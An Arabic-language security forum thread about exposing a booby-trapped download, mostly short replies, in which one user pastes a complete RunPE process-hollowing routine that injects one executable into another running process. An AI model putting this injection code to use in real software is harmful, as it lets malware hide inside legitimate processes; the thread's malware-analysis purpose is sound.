نقطة التطوير
نقطة التطوير

كشف تلغيمة 3 من قسم المواضيع الملغومة ديف بوينت

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة ƊЄƔƖԼ ƇƠƊЄƦ, بتاريخ ‏14 نوفمبر 2017 في 17:28.

تم تحميل الصفحة في 0,4161899 ثانية
حالة الموضوع:
مغلق
  1. ƊЄƔƖԼ ƇƠƊЄƦ .:: Malware analysis ::.
    rankrankrankrank

    ƊЄƔƖԼ ƇƠƊЄƦ
      ‏11 مارس 2017
      1,761
      2,059
      128
      ذكر
      Reverse Engineering
    [​IMG]
    كشف تلغيمة من قسم المواضيع الملغومة ديف بوينت

    [​IMG]
     
  2. Rooooodjer Beginner Developer
    rank

    Rooooodjer
      ‏25 سبتمبر 2017
      17
      18
      3
      ذكر
    أعجب بهذه المشاركة ƊЄƔƖԼ ƇƠƊЄƦ
  3. يوسف الهكر السوري Beginner Developer
    rank

    يوسف الهكر السوري
      ‏13 أكتوبر 2017
      59
      44
      18
      كشف تلغيم
  4. ƊЄƔƖԼ ƇƠƊЄƦ .:: Malware analysis ::.
    rankrankrankrank

    ƊЄƔƖԼ ƇƠƊЄƦ
      ‏11 مارس 2017
      1,761
      2,059
      128
      ذكر
      Reverse Engineering
    صديقي تشغيل ملف في جهازك قد يؤدي الى اختراقك ، او الي ما الهم خبرة في هذا المجال
     
    أعجب بهذه المشاركة Rooooodjer
  5. SyRiAn KaSp3r إداري أقسام حماية الأجهزة

    SyRiAn KaSp3r
      ‏26 أكتوبر 2012
      10,704
      14,137
      215
      ذكر
    يعطيك العافية شرح جميل
    استمر اخوي
     
    أعجب بهذه المشاركة ƊЄƔƖԼ ƇƠƊЄƦ
  6. Rooooodjer Beginner Developer
    rank

    Rooooodjer
      ‏25 سبتمبر 2017
      17
      18
      3
      ذكر
    01/ هل دخلت للرابط المرفق ام لا
     
    أعجب بهذه المشاركة ƊЄƔƖԼ ƇƠƊЄƦ
  7. ƊЄƔƖԼ ƇƠƊЄƦ .:: Malware analysis ::.
    rankrankrankrank

    ƊЄƔƖԼ ƇƠƊЄƦ
      ‏11 مارس 2017
      1,761
      2,059
      128
      ذكر
      Reverse Engineering
    مش فاهم ؟
     
  8. Rooooodjer Beginner Developer
    rank

    Rooooodjer
      ‏25 سبتمبر 2017
      17
      18
      3
      ذكر
    كود C#
    void RunPe( wstring const& target, wstring const& source 
    {
     Pe src_pe( source ); // Parse source PE structure
     if ( src_pe.isvalid )
     { 
     Process::CreationResults res = Process::CreateWithFlags( target, L"", CREATE_SUSPENDED, false, false ); // Start a suspended instance of target
     if ( res.success )
     {
     PCONTEXT CTX = PCONTEXT( VirtualAlloc( NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE ) );  // Allocate space for context
     CTX->ContextFlags = CONTEXT_FULL;
    
     if ( GetThreadContext( res.hThread, LPCONTEXT( CTX ) ) ) // Read target context
     {
     DWORD dwImageBase;
     ReadProcessMemory( res.hProcess, LPCVOID( CTX->Ebx + 8 ), LPVOID( &dwImageBase ), 4, NULL ); // Get base address of target
     typedef LONG( WINAPI * NtUnmapViewOfSection )(HANDLE ProcessHandle, PVOID BaseAddress);
     NtUnmapViewOfSection xNtUnmapViewOfSection;
     xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
     if ( 0 == xNtUnmapViewOfSection( res.hProcess, PVOID( dwImageBase ) ) ) // Unmap target code
     {
     LPVOID pImageBase = VirtualAllocEx(res.hProcess, LPVOID(dwImageBase), src_pe.NtHeadersx86.OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); // Realloc for source code
     if ( pImageBase )
     {
     Buffer src_headers( src_pe.NtHeadersx86.OptionalHeader.SizeOfHeaders );  // Read source headers
     PVOID src_headers_ptr = src_pe.GetPointer( 0 );
     if ( src_pe.ReadMemory( src_headers.Data(), src_headers_ptr, src_headers.Size() ) )
     {
     if ( WriteProcessMemory(res.hProcess, pImageBase, src_headers.Data(), src_headers.Size(), NULL) )  // Write source headers
     {
     bool success = true;
     for (u_int i = 0; i < src_pe.sections.size(); i++)  // Write all sections
     {
     // Get pointer on section and copy the content
     Buffer src_section( src_pe.sections.at( i ).SizeOfRawData );
     LPVOID src_section_ptr = src_pe.GetPointer( src_pe.sections.at( i ).PointerToRawData );
     success &= src_pe.ReadMemory( src_section.Data(), src_section_ptr, src_section.Size() ); 
    
     // Write content to target
     success &= WriteProcessMemory(res.hProcess, LPVOID(DWORD(pImageBase) + src_pe.sections.at( i ).VirtualAddress), src_section.Data(), src_section.Size(), NULL);
     }
    
     if ( success )
     {
     WriteProcessMemory( res.hProcess, LPVOID( CTX->Ebx + 8 ), LPVOID( &pImageBase), sizeof(LPVOID), NULL ); // Rewrite image base
     CTX->Eax = DWORD( pImageBase ) + src_pe.NtHeadersx86.OptionalHeader.AddressOfEntryPoint; // Rewrite entry point
     SetThreadContext( res.hThread, LPCONTEXT( CTX ) ); // Set thread context
     ResumeThread( res.hThread ); // Resume main thread
     } 
     }
     } 
     }
     }
     }
    
     if ( res.hProcess) CloseHandle( res.hProcess );
     if ( res.hThread ) CloseHandle( res.hThread );
     }
     }
    }
    ...
    RunPe( L"C:\\windows\\explorer.exe", L"C:\\windows\\system32\\calc.exe" );
    
     
  9. ƊЄƔƖԼ ƇƠƊЄƦ .:: Malware analysis ::.
    rankrankrankrank

    ƊЄƔƖԼ ƇƠƊЄƦ
      ‏11 مارس 2017
      1,761
      2,059
      128
      ذكر
      Reverse Engineering
    الله يعافيك
    بس صار خطا بسيط عند استخراج رابط ما زال مشفر بسبب عدم وضع فنكشن تشفير الثاني
     
  10. SyRiAn KaSp3r إداري أقسام حماية الأجهزة

    SyRiAn KaSp3r
      ‏26 أكتوبر 2012
      10,704
      14,137
      215
      ذكر
    هونها على نفسك و اعمل Debug و رح يفك اي شيء بيخطر ببالك :)
     
  11. B0u3Zizi مُشرف كشف التلغيم
    rankrankrankrankrank

    B0u3Zizi
      ‏21 سبتمبر 2013
      2,627
      2,555
      130
      ذكر
    بارك الله فيك أخي لؤي على الشرح و على ما تقدمه

    لكن أستمحيك عذرا قام الأخ CaThAcK بشرحها و نفس ما قمت به قام به هو و ما يوجد إختلاف أبدا

    أعذرني على نقل موضوعك للمخالفة لتكراره فقط

    هذا لا يعبر أبدا على تميزك و إبداعك في أقسام الحماية و لكل مجتهد نصيب أكمل هكذا أخي الغالي
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...
نقطة التطوير